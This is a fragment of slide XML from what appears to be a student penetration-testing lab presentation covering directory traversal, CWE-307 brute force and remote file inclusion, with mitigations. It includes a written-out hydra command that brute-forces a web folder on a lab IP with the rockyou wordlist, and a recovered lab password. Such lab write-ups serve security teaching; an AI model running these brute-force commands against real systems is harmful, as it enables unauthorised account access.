              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Store uploaded files in a location not accessible from the web.</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 </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Whitelist known IPs and remove all file execution from external sources. </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HyperV</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Webdav</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Apache</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4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699599" cy="3897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{DDB33C20-51FE-4208-8B7B-8A7901A86086}</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HyperV</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virtual server that houses other servers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Vulnerable pentesting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Server using Kibana to collect logs and metrics from other servers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Pentesting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{DDB33C20-51FE-4208-8B7B-8A7901A86086}</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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Traversal Attack</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 kind of Brute force attack which will give potential access to restricted files and directories.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Tell the attacker about the directory structure of the web application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Brute Force Vulnerability</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CWE-307</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The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.</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An attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account.</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Remote File Inclusion (RFI)</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An inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts.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consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution.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Directory Traversal Attack</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We leveraged the Dirb Command in Kali to locate hidden directories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Two directories were found. Server-status and webdav.</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6150713" y="1603138"/>
            <a:ext cx="2872424" cy="2244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CWE-307 Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;111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Leveraged the hydra tool to run a brute force attack against the secret_folder directory using Ashton’s discovered username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6" name="Google Shape;1116;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1117" name="Google Shape;1117;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120" name="Google Shape;112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1" name="Google Shape;112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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;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5" name="Google Shape;1125;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Hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="3064862"/>
            <a:ext cx="2599051" cy="478425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129;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Ashton’s password was discovered to be leopoldo which lead to Ryan’s password hash and directions to gain access to the companies webdav server</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465425" y="3671751"/>
            <a:ext cx="3678576" cy="70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